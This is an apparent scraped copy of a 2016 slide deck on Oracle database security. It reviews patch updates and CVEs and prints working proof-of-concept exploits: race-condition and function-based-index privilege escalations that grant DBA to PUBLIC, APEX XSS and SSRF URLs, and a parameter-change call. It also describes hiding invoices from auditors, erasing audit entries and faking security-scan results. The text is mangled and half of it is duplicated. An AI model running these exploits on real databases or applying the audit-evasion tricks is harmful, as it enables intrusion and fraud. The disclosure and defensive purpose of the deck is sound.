Upload
others
View
1
Download
0
Embed Size (px)
Citation preview
Best of Oracle Security 2016
What happened in 2016
Oracle Backdoor amp NSA
Kaspersky report notes that somewhere in mid
2002 or 2003 Equation Group members (=NSA Hacker Team) used the Oracle database
installation CD to infect multiple targets with
malware from the grouprsquos extensive libraryldquo
httpwwwtechwormnet201502equation-group-nsa-backdoor-in-hardware-30-countrieshtml
Agenda
iexcl Intro
iexcl January 2016 - November 2016
iexcl Outlook 2017
iexcl QampA
Introduction
What will be shown in the next 45 minutes
iexcl Oracle Security Patches
iexcl Modify SQL statements amp Application Logic
iexcl Outlook 2017
Oracle Patches
Database Vulnerabilities and CPU
Patch situation is getting better but Oracle 12c
offers a large new playground (=tons of new
features) for security researchers
Problem Just a few people are doing security
research in the database
Nearly 50 of the database vulnerabilities were
foundreported by 2 researchers (David
Litchfield amp Alexander Kornbrust)
Oracle Vulnerabilities 2016
Oracle Vulnerabilities 2016
Number of vulnerabilities in Oracle database increasing again
iexcl 30 findings in 2016 (2015 29 2014 43 2013 13 2012 17)
iexcl 8 remote exploitable bugs (20153 2014 4 2013 7 2012 8 )
bull January 2016 CPU (7 Vulnerabilities ndash 0 remote)
bull April 2016 CPU (5 Vulnerabilities ndash 2 remote)
bull July 2016 CPU (9 Vulnerabilities ndash 5 remote)
bull October 2016 CPU (9 Vulnerabilities ndash 1 remote)
2016
January 2016
Oracle CPU January 2016
Exploiting the Oracle Workspace Manager SQL
Race Condition (David Litchfield)
DB Database Assessment Tool
httpwwworaclecomtechnetworktopicssecuritycpujan2016-2367955html httpwwwdavidlitchfieldcomExploitingtheOracleWorkspaceManagerSQLRaceConditionpdf httpsgithubcomfoospidyDbDat
January 2016 CPU
7 security fixes (No remote exploitable)
1 Java VM (CVSS 90)
1 Workspace Manager (CVSS 65)
2 XML Database (CVSS 55 40)
1 Database Vault (CVSS 40)
1 Security (CVSS 40)
1 XML Developerrsquos Kit (CVSS 40)
httpwwworaclecomtechnetworktopicssecuritycpujan2016-2367955html
Jan 2016 CPU- CVE-2016-0467
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Oracle native auditing fails to capture
bdquoCreate Java Sourceldquo
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
Jan 2016 CPU- CVE-2015-4921
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Status is incorrectly reported if SYS
Auditing is used together with DB Vault
Reporter David Litchfield
Jan 2016 CPU- CVE-2015-4925
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Privilege escalation via Race Condition
in WMSYSLTCOPYFORUPDATE
Reporter David Litchfield
The Oracle Workspace Manager allows a user to version enable database tables This is achieved by creating workspaces which contain the versioned data The Workspace Manager contains a number of PLSQL packages that are used to manage workspaces To function correctly some management actions must be performed with higher privileges than a normal user might have and so to enable this some of the management functions execute with the privileges of the WMSYS user The main workspace manager interface is the LT PLSQL package and this executes with the privileges of the user that calls or invokes LT When privileged work is required to be executed LT calls the LTADM package The LTADM package executes with the privileges of the owner or definer in this case WMSYS WMSYS has a number of very powerful privileges such as CREATE ANY TRIGGER that allows the grantee the privilege to create a trigger in any schema with the exception of the SYS schema
Jan 2016 CPU- CVE-2015-4925
SELECT COUNT() INTO CNTFROM V$OPEN_CURSOR OC V$SQL S V$OBJECT_DEPENDENCY OD WHERE OCSID = USER_SID AND [hellip] AND ODTO_TYPE IN (78911)
Here ODTO_TYPEs 789 and 11 are functions procedures packages and objects If any such dependency exists then the user supplied query will not be executed and an error is raised IF (CNTgt0) THEN WMSYSWM_ERRORRAISEERROR(WMSYSLTWM_ERROR_81_NO) END IF
SQL_STR2 =declaredelstatuses wmsysltUtilnumber_tab beginselect WM_delstatus bulk collect into delstatusesfrom || WMSYSLTUTILGETVN(TABLE_OWNER TAB_NAME _BASE) || where WM_version = || CURVER || and || NEWWHERE_CLAUSE || for updateend WMSYSLTADMEXECSQL(SQL_STR2)
Jan 2016 CPU- CVE-2015-4925SQLgt CONNECT RACERPASSWORD SQLgt CREATE TABLE FOO(X NUMBER CONSTRAINT X_PK PRIMARY KEY(X)) SQLgt INSERT INTO FOO (X) VALUES (1) SQLgt COMMITSQLgt EXEC WMSYSLTENABLEVERSIONING(sbquoFOO)
SQLgt create or replace function Y return number authid current_user is 2 pragma autonomous_transaction3 begin4 dbms_outputput_line(BANG)5 execute immediate create or replace procedure owned(p varchar) is begin execute immediate p end6 execute immediate grant execute on owned to public7 dbms_outputput_line(sys_context(userenvcurrent_user)) 8 return 19 end 10
Jan 2016 CPU- CVE-2015-4925SQLgt GRANT EXECUTE ON Y TO PUBLIC SQLgt CREATE TABLE RACER(Y NUMBER) SQLgt INSERT INTO RACER(Y) VALUES (1) SQLgt COMMIT
SQLgt create or replace procedure attempt_it is 2 begin 3 execute immediate BEGIN WMSYSLTCOPYFORUPDATE(FOOX=LENGTH((SELECT 1 FROM RACERRACER WHERE RACERY=1))) END 4 exception when others then 5 null6 end7 SQLgt declare2 i number=0 3 begin4 for i in 11000 loop 5 execute immediate alter table RACERRACER rename column Y to Z6 execute immediate alter table RACERRACER rename column Z to Y7 end loop 8 end9
Jan 2016 CPU- CVE-2015-4925
SQLgt DESC WMSYSOWNED
PROCEDURE WMSYSOWNED Argument Name Type InOut Default mdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdash-
P VARCHAR2 IN
February 2016
nothing special happened
March 2016
nothing special happened
April 2016
Oracle CPU April 2016
httpwwworaclecomtechnetworktopicssecuritycpuapr2015-2365600html
April 2016 CPU
5 security fixes (2 remote exploitable)
1 Java VM (CVSS 90)
1 OLAP (CVSS 78)
3 RDBMS Security (CVSS 59 33 33 1 remote)
httpwwworaclecomtechnetworksecurity-advisorycpuapr2016v3-2985753html
Apr 2016 CPU- CVE-2016-0690
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem AUDIT NOT EXISTS fails to capture
attempts to execute a procedure that does not
exist either because the user does not have the
execute privilege on it or because the
procedure does not exist If a DBA wants to
capture attempts to execute procedures where
the user does not have the execute privilege we
must also add
Reporter David Litchfield
Exploit
AUDIT EXECUTE PROCEDURE WHENEVER NOT SUCCESSFUL
Apr 2016 CPU- CVE-2016-0691
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem A missing (due to no execute
privilege) function is within a SELECT query the
name of the function is not logged but the
name of the table in the query
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
May 2016
Nothing special happened
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 90)
1 JDBC (CVSS 81 remote)
1 Portable Clusterware (CVSS 75 remote)
1 Data Pump (CVSS 67)
2 APEX (CVSS 61 58 2 remote)
1 RDBMS Security (CVSS 53 remote)
DB Shardening (CVSS 44)
1 Database Vault (CVSS 34)
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
Jul 2016 CPU- CVE-2016-3448
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem The HTMLDB_UTIL PLSQL package is
vulnerable to a XSS flaw To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex
Reporter David Litchfield
Exploit
httpexamplecomordsapex_050000htmldb_utilJSON_FROM_ARRAYP_COLS=1ampP_NAM E01=XX223E3CH13EOops3CH13EampP_F01=YampP_ROWS=1
Jul 2016 CPU- CVE-2016-3467
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem Apex 5 is vulnerable to a server side
request forgery flaw ie it can be made to connect
to another web server and port regardless of
whether allowed URLs have been configured For
example the request below will connect to
someotherserver on port and POST X as a payload
This can be used as a port scanning mechanism
used to attack systems protected by a firewall etc
Reporter David Litchfield
Exploit
httpexampleordsapex_050000WWV_FLOW_WEBSERVICES_APIMAKE_REQUESTP_U RL=httpsomeotherserverportampp_envelope=X
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Oracle Backdoor amp NSA
Kaspersky report notes that somewhere in mid
2002 or 2003 Equation Group members (=NSA Hacker Team) used the Oracle database
installation CD to infect multiple targets with
malware from the grouprsquos extensive libraryldquo
httpwwwtechwormnet201502equation-group-nsa-backdoor-in-hardware-30-countrieshtml
Agenda
iexcl Intro
iexcl January 2016 - November 2016
iexcl Outlook 2017
iexcl QampA
Introduction
What will be shown in the next 45 minutes
iexcl Oracle Security Patches
iexcl Modify SQL statements amp Application Logic
iexcl Outlook 2017
Oracle Patches
Database Vulnerabilities and CPU
Patch situation is getting better but Oracle 12c
offers a large new playground (=tons of new
features) for security researchers
Problem Just a few people are doing security
research in the database
Nearly 50 of the database vulnerabilities were
foundreported by 2 researchers (David
Litchfield amp Alexander Kornbrust)
Oracle Vulnerabilities 2016
Oracle Vulnerabilities 2016
Number of vulnerabilities in Oracle database increasing again
iexcl 30 findings in 2016 (2015 29 2014 43 2013 13 2012 17)
iexcl 8 remote exploitable bugs (20153 2014 4 2013 7 2012 8 )
bull January 2016 CPU (7 Vulnerabilities ndash 0 remote)
bull April 2016 CPU (5 Vulnerabilities ndash 2 remote)
bull July 2016 CPU (9 Vulnerabilities ndash 5 remote)
bull October 2016 CPU (9 Vulnerabilities ndash 1 remote)
2016
January 2016
Oracle CPU January 2016
Exploiting the Oracle Workspace Manager SQL
Race Condition (David Litchfield)
DB Database Assessment Tool
httpwwworaclecomtechnetworktopicssecuritycpujan2016-2367955html httpwwwdavidlitchfieldcomExploitingtheOracleWorkspaceManagerSQLRaceConditionpdf httpsgithubcomfoospidyDbDat
January 2016 CPU
7 security fixes (No remote exploitable)
1 Java VM (CVSS 90)
1 Workspace Manager (CVSS 65)
2 XML Database (CVSS 55 40)
1 Database Vault (CVSS 40)
1 Security (CVSS 40)
1 XML Developerrsquos Kit (CVSS 40)
httpwwworaclecomtechnetworktopicssecuritycpujan2016-2367955html
Jan 2016 CPU- CVE-2016-0467
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Oracle native auditing fails to capture
bdquoCreate Java Sourceldquo
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
Jan 2016 CPU- CVE-2015-4921
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Status is incorrectly reported if SYS
Auditing is used together with DB Vault
Reporter David Litchfield
Jan 2016 CPU- CVE-2015-4925
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Privilege escalation via Race Condition
in WMSYSLTCOPYFORUPDATE
Reporter David Litchfield
The Oracle Workspace Manager allows a user to version enable database tables This is achieved by creating workspaces which contain the versioned data The Workspace Manager contains a number of PLSQL packages that are used to manage workspaces To function correctly some management actions must be performed with higher privileges than a normal user might have and so to enable this some of the management functions execute with the privileges of the WMSYS user The main workspace manager interface is the LT PLSQL package and this executes with the privileges of the user that calls or invokes LT When privileged work is required to be executed LT calls the LTADM package The LTADM package executes with the privileges of the owner or definer in this case WMSYS WMSYS has a number of very powerful privileges such as CREATE ANY TRIGGER that allows the grantee the privilege to create a trigger in any schema with the exception of the SYS schema
Jan 2016 CPU- CVE-2015-4925
SELECT COUNT() INTO CNTFROM V$OPEN_CURSOR OC V$SQL S V$OBJECT_DEPENDENCY OD WHERE OCSID = USER_SID AND [hellip] AND ODTO_TYPE IN (78911)
Here ODTO_TYPEs 789 and 11 are functions procedures packages and objects If any such dependency exists then the user supplied query will not be executed and an error is raised IF (CNTgt0) THEN WMSYSWM_ERRORRAISEERROR(WMSYSLTWM_ERROR_81_NO) END IF
SQL_STR2 =declaredelstatuses wmsysltUtilnumber_tab beginselect WM_delstatus bulk collect into delstatusesfrom || WMSYSLTUTILGETVN(TABLE_OWNER TAB_NAME _BASE) || where WM_version = || CURVER || and || NEWWHERE_CLAUSE || for updateend WMSYSLTADMEXECSQL(SQL_STR2)
Jan 2016 CPU- CVE-2015-4925SQLgt CONNECT RACERPASSWORD SQLgt CREATE TABLE FOO(X NUMBER CONSTRAINT X_PK PRIMARY KEY(X)) SQLgt INSERT INTO FOO (X) VALUES (1) SQLgt COMMITSQLgt EXEC WMSYSLTENABLEVERSIONING(sbquoFOO)
SQLgt create or replace function Y return number authid current_user is 2 pragma autonomous_transaction3 begin4 dbms_outputput_line(BANG)5 execute immediate create or replace procedure owned(p varchar) is begin execute immediate p end6 execute immediate grant execute on owned to public7 dbms_outputput_line(sys_context(userenvcurrent_user)) 8 return 19 end 10
Jan 2016 CPU- CVE-2015-4925SQLgt GRANT EXECUTE ON Y TO PUBLIC SQLgt CREATE TABLE RACER(Y NUMBER) SQLgt INSERT INTO RACER(Y) VALUES (1) SQLgt COMMIT
SQLgt create or replace procedure attempt_it is 2 begin 3 execute immediate BEGIN WMSYSLTCOPYFORUPDATE(FOOX=LENGTH((SELECT 1 FROM RACERRACER WHERE RACERY=1))) END 4 exception when others then 5 null6 end7 SQLgt declare2 i number=0 3 begin4 for i in 11000 loop 5 execute immediate alter table RACERRACER rename column Y to Z6 execute immediate alter table RACERRACER rename column Z to Y7 end loop 8 end9
Jan 2016 CPU- CVE-2015-4925
SQLgt DESC WMSYSOWNED
PROCEDURE WMSYSOWNED Argument Name Type InOut Default mdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdash-
P VARCHAR2 IN
February 2016
nothing special happened
March 2016
nothing special happened
April 2016
Oracle CPU April 2016
httpwwworaclecomtechnetworktopicssecuritycpuapr2015-2365600html
April 2016 CPU
5 security fixes (2 remote exploitable)
1 Java VM (CVSS 90)
1 OLAP (CVSS 78)
3 RDBMS Security (CVSS 59 33 33 1 remote)
httpwwworaclecomtechnetworksecurity-advisorycpuapr2016v3-2985753html
Apr 2016 CPU- CVE-2016-0690
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem AUDIT NOT EXISTS fails to capture
attempts to execute a procedure that does not
exist either because the user does not have the
execute privilege on it or because the
procedure does not exist If a DBA wants to
capture attempts to execute procedures where
the user does not have the execute privilege we
must also add
Reporter David Litchfield
Exploit
AUDIT EXECUTE PROCEDURE WHENEVER NOT SUCCESSFUL
Apr 2016 CPU- CVE-2016-0691
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem A missing (due to no execute
privilege) function is within a SELECT query the
name of the function is not logged but the
name of the table in the query
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
May 2016
Nothing special happened
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 90)
1 JDBC (CVSS 81 remote)
1 Portable Clusterware (CVSS 75 remote)
1 Data Pump (CVSS 67)
2 APEX (CVSS 61 58 2 remote)
1 RDBMS Security (CVSS 53 remote)
DB Shardening (CVSS 44)
1 Database Vault (CVSS 34)
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
Jul 2016 CPU- CVE-2016-3448
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem The HTMLDB_UTIL PLSQL package is
vulnerable to a XSS flaw To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex
Reporter David Litchfield
Exploit
httpexamplecomordsapex_050000htmldb_utilJSON_FROM_ARRAYP_COLS=1ampP_NAM E01=XX223E3CH13EOops3CH13EampP_F01=YampP_ROWS=1
Jul 2016 CPU- CVE-2016-3467
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem Apex 5 is vulnerable to a server side
request forgery flaw ie it can be made to connect
to another web server and port regardless of
whether allowed URLs have been configured For
example the request below will connect to
someotherserver on port and POST X as a payload
This can be used as a port scanning mechanism
used to attack systems protected by a firewall etc
Reporter David Litchfield
Exploit
httpexampleordsapex_050000WWV_FLOW_WEBSERVICES_APIMAKE_REQUESTP_U RL=httpsomeotherserverportampp_envelope=X
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
